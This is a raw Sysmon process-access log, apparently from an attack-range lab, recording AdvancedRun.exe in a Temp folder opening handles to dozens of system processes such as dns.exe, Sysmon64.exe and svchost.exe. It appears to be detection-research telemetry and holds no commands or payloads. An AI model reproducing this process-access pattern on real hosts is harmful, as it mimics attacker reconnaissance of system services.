18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 